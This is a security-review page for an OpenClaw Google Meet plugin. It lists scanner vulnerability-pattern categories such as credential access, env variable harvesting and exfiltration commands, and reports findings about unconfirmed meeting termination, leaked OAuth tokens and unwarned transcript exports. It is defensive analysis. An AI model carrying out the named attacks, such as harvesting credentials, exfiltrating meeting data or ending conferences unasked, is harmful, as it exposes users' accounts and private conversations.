ClawHub

Google Meet

Security checks across malware telemetry and agentic risk

Overview

This official OpenClaw Google Meet plugin has sensitive meeting and OAuth capabilities, but they are coherent with its Meet participation and management purpose and are not hidden exfiltration or destructive malware.

Install only if you want OpenClaw to join and manage Google Meet calls. Configure OAuth tokens carefully, avoid exposing token output in logs or screen shares, use transcript/attendance exports only in protected locations, and restrict who can invoke create/end-conference or owner-level realtime tool policies.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Findings (9)

Context-Inappropriate Capability

Medium
Confidence
93% confidence
Finding
The skill can create new Google Meet spaces and end active conferences using OAuth-backed write actions, but this file shows no local authorization check, confirmation step, or intent validation before executing destructive behavior. If exposed through a broader agent workflow, a prompt injection, misrouted tool call, or unauthorized invocation could abruptly terminate live meetings or create meetings without user approval.

Context-Inappropriate Capability

Medium
Confidence
88% confidence
Finding
The configuration permits user-supplied command arrays for audioInputCommand, audioOutputCommand, bargeInInputCommand, audioBridgeCommand, and related health commands. If any downstream component executes these arrays as subprocesses, an attacker who can influence configuration can achieve arbitrary local command execution, which is especially dangerous in an agent/plugin environment that may run with user or service privileges.

Description-Behavior Mismatch

Medium
Confidence
93% confidence
Finding
The plugin advertises itself as only joining Google Meet calls through Chrome or Twilio, but the implementation also accesses Google Calendar, OAuth tokens, conference artifacts, attendance, transcripts, export bundles, and can end active conferences. This scope understatement can mislead operators and higher-level agents into granting or invoking the tool with broader privileges than intended, increasing the chance of unauthorized data access or destructive actions.

Intent-Code Divergence

Medium
Confidence
90% confidence
Finding
The description says realtime tools are 'safe read-only' by default, yet the code can resolve broader consult tools based on policy in bidi mode and the consult pathway may invoke more than narrowly bounded status checks. This creates a trust-boundary mismatch where users or upstream agents may assume harmless read-only behavior and approve actions that can exercise broader tool access.

Missing User Warnings

High
Confidence
95% confidence
Finding
The `endGoogleMeetActiveConference` function issues a direct write request to terminate a live conference after resolving the meeting space, with no visible confirmation, dual control, or safety interlock in this file. In an agent setting, destructive real-time actions are especially dangerous because a mistaken or manipulated invocation can immediately disrupt ongoing communications for all participants.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The export flow writes transcripts, attendance, raw artifacts, and optionally document bodies to disk and ZIP archives without any explicit sensitivity warning or secure-default storage controls. In this skill context, the data is highly sensitive meeting content and participant metadata, so silent persistence materially increases risk of accidental disclosure through shared disks, backups, or later exfiltration.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The OAuth login command prints configuration JSON containing refreshToken and accessToken directly to stdout, and only labels it as something to paste into config. In terminals with scrollback capture, shell logging, CI logs, screen sharing, or multi-user environments, this can expose long-lived credentials that enable API access beyond the immediate session.

Missing User Warnings

Medium
Confidence
89% confidence
Finding
The artifacts and attendance commands allow writing meeting metadata to arbitrary user-supplied paths without warning that the output may contain sensitive participant, attendance, and transcript-derived information. In a meeting-analysis skill, this context makes the issue more serious because operators may unintentionally persist regulated or confidential data to insecure locations.

Missing User Warnings

Medium
Confidence
84% confidence
Finding
The manifest describes joining Google Meet calls and supports realtime transcription, browser automation, and voice participation, but the top-level description does not clearly warn users that the plugin may enter meetings and capture/transcribe live audio. In a communications plugin handling private meetings, missing explicit privacy disclosure can lead to uninformed consent failures and accidental surveillance of sensitive conversations.

VirusTotal

59/59 vendors flagged this plugin as clean.

View on VirusTotal